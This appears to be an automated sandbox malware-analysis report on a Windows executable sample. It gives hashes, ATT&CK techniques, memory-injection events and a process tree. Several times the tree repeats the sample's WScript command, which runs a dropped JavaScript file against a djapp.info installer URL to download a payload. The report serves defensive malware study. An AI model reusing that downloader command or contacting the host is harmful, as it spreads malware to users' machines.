ae346077a06015fd74b94653f5ce7b38972ad3bcafe8536b26adde251b2f52d0

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
09-05-2024 17:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe
Size

184KB
MD5

2b0ffc288ecf560afb88190c0deddf3c
SHA1

ca0cb10b73195578254d6ec195df5d0ace8c534f
SHA256

ae346077a06015fd74b94653f5ce7b38972ad3bcafe8536b26adde251b2f52d0
SHA512

73eb95ffa9783f7d8431bc309a7f32c4d1b82b6925292e3df15ebb7e77f6678800fd54a17985258a00502a12a5e0f06c08ba0abbb51a518b92e0ceb4c9ac8ba8
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3j:/7BSH8zUB+nGESaaRvoB7FJNndn6

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2284	WScript.exe
8	2284	WScript.exe
10	2284	WScript.exe
12	2552	WScript.exe
13	2552	WScript.exe
15	1636	WScript.exe
16	1636	WScript.exe
18	896	WScript.exe
19	896	WScript.exe
21	2024	WScript.exe
22	2024	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1504	1268	WerFault.exe	27

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1268 wrote to memory of 2284	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	28
PID 1268 wrote to memory of 2284	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	28
PID 1268 wrote to memory of 2284	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	28
PID 1268 wrote to memory of 2284	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	28
PID 1268 wrote to memory of 2552	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	30
PID 1268 wrote to memory of 2552	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	30
PID 1268 wrote to memory of 2552	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	30
PID 1268 wrote to memory of 2552	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	30
PID 1268 wrote to memory of 1636	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	32
PID 1268 wrote to memory of 1636	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	32
PID 1268 wrote to memory of 1636	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	32
PID 1268 wrote to memory of 1636	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	32
PID 1268 wrote to memory of 896	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	34
PID 1268 wrote to memory of 896	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	34
PID 1268 wrote to memory of 896	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	34
PID 1268 wrote to memory of 896	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	34
PID 1268 wrote to memory of 2024	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	36
PID 1268 wrote to memory of 2024	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	36
PID 1268 wrote to memory of 2024	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	36
PID 1268 wrote to memory of 2024	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	36
PID 1268 wrote to memory of 1504	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	38
PID 1268 wrote to memory of 1504	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	38
PID 1268 wrote to memory of 1504	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	38
PID 1268 wrote to memory of 1504	1268	2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\2b0ffc288ecf560afb88190c0deddf3c_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1268
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEC0.js" http://www.djapp.info/?domain=FjKbgWKzYs.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufEC0.exe
  2⤵
  - Blocklisted process makes network request
  PID:2284
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEC0.js" http://www.djapp.info/?domain=FjKbgWKzYs.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufEC0.exe
  2⤵
  - Blocklisted process makes network request
  PID:2552
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEC0.js" http://www.djapp.info/?domain=FjKbgWKzYs.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufEC0.exe
  2⤵
  - Blocklisted process makes network request
  PID:1636
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEC0.js" http://www.djapp.info/?domain=FjKbgWKzYs.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufEC0.exe
  2⤵
  - Blocklisted process makes network request
  PID:896
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEC0.js" http://www.djapp.info/?domain=FjKbgWKzYs.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuVwucrPYE19JkwWjSZ2s2qvmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4eNq6LaFY79XZ6m0stLMqjuzx-uhliieAKdKyysjy6-7bTV8zh C:\Users\Admin\AppData\Local\Temp\fufEC0.exe
  2⤵
  - Blocklisted process makes network request
  PID:2024
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 612
  2⤵
  - Program crash
  PID:1504

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
5857aff0ea0365561d0f06769a04101c

SHA1
0ac570f0ec93618c5849baf94c0a167e4a706a95

SHA256
b50c616b5c29bd9611ed360a238b6b6c421d0fe3b85df331e4951aefab526b2e

SHA512
1863b40407893a4a26beaa7ae4add199676c15b633d59afb4dfd2906328b29497fdddcb0ff01b9ba77ac59c5c55511fa669b0ffd6e02bcfa2d2cc53df62390be

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
d9cad8648d8d6ba425a687b5559f28af

SHA1
c415be9e2e9ff280c45869f0f7449712cfd40dbd

SHA256
cc633299b7fabab4b685a5911408b04c144786daa1e28bb40a0bd021a4cc2774

SHA512
be82bd7f3cda293b86371bf3d08c521d595fb99afde1b1ac2b4afd78c3d596f399f81392e5170c7ac08066136bd4bf13b5efe3479289a1619886051fbc217c8e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e0013f06ec4fcda0624011f8d31e4d9f

SHA1
88d5117ea29ca513a8733e654601be867367201a

SHA256
30021370e2fbf425f0ae67964585e350e348e58a335c43fc481cfb0b90572c1a

SHA512
6dd14d5dee31d0e9eaf9acfdcdb16735b1aeb7243580b44be25f16a6432c097e1cfa55fb08a897fe036e4ac1aecbe52380f9c2bb8b3f431be1ab2e7a346bb99d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
6361984799565439bf72916701e07c2d

SHA1
9cfd8aa93c592f21c23dcead23cf4555904da252

SHA256
d9f2720459e62f6a765f06ee60a104e89cb72d81053d1c2f5e9456a3976cf5b4

SHA512
4d7baba1617d4de7c67c8d89b3a4d386c38b10327aef6e2385cb53261971c6adb550c9165e1a524e3b7f30f21fe1e3825f3b711eadbc9fe27ddc81b8eb709de3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm

Filesize
6KB

MD5
69d9148ba2eb06c4291642939948d63e

SHA1
731da61d8a8c4f2ca92ad278261c16cb3f80a1e4

SHA256
6ae39e89796d3006b51e142cc3dc4ec81893a1caf86a0e89f53ed95b5cd5a641

SHA512
fe268eb1ea5bb5926d38f4b4b1f09f7ff422278ad1ad9c7c76f767e2b9e7ccb6e5ec0a0e9f581f956d6e83bb1860d2f25e22f6da8790284d20feed008587eb3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm

Filesize
40KB

MD5
b4e1f255056556f6ef233be8f9d47753

SHA1
c27e8944e92d805f1a224f3abe3080e78aefb373

SHA256
89c7a6dd64dfb1c2c3ba3f2066220540373fc911d9e08b819e7b599817aa5ac4

SHA512
3d0f13640779cdd93e211915166dd27b1d2197b125b6ecf037315f5ef3c0e03a65693bf406f5eac16163f65363e562208507f3d98eb43e4978a1e69673444cfb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm

Filesize
40KB

MD5
bd58ad7197a7de0e04a5cc8b0c42b5a0

SHA1
a65f9e8c54422af016b16e0da6db2754ff2b3845

SHA256
d2fe02bf364d9c52f68d314d16a00ffd2ba28a5f1110b903fc758f32a4c36da8

SHA512
ed91291205b25e2aac3ac137dd5b30aa61c44957547f6cb4ce37bd6c60396783567cfe35e12ed2f1a25ddf835d869967bac751c9e24dfb7449c74a9df767adce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm

Filesize
6KB

MD5
ecdd8dff4fd46d303810f4c35c217e47

SHA1
6d1d9c9a735a710aeaecbf569f85885ed8493701

SHA256
3736755111be457a3b476fe11b6b2e1557320d17c12ead3c36ae0a577e0aa5c8

SHA512
374f807b842fef68e6533db931d52f5b031ab02cd219706205ff19365bc692e8042ee9acafdf9a572e223b2f19b3a09609ce4655c44a800138a0e7e4e7120b6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3FAF.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5774.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufEC0.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\78OZ01QN.txt

Filesize
175B

MD5
266af2d08ab13f5878f8444915aa5dbb

SHA1
7b528910cc000ccae20bb090e17e6868e09e9271

SHA256
73837cba933bd61e27d2591ed0038ed09dc102f6db8307ca8b0c76e8e516d2c2

SHA512
350cf7158e256d669774ec87c22eb08ee614d8f0c52b9f3ab893f1c08d6bedd000e663d05ec6ebaafe43dd6fcaad436b622cf0d0d9855fd45d7c2cd950b3fcad

Download Submit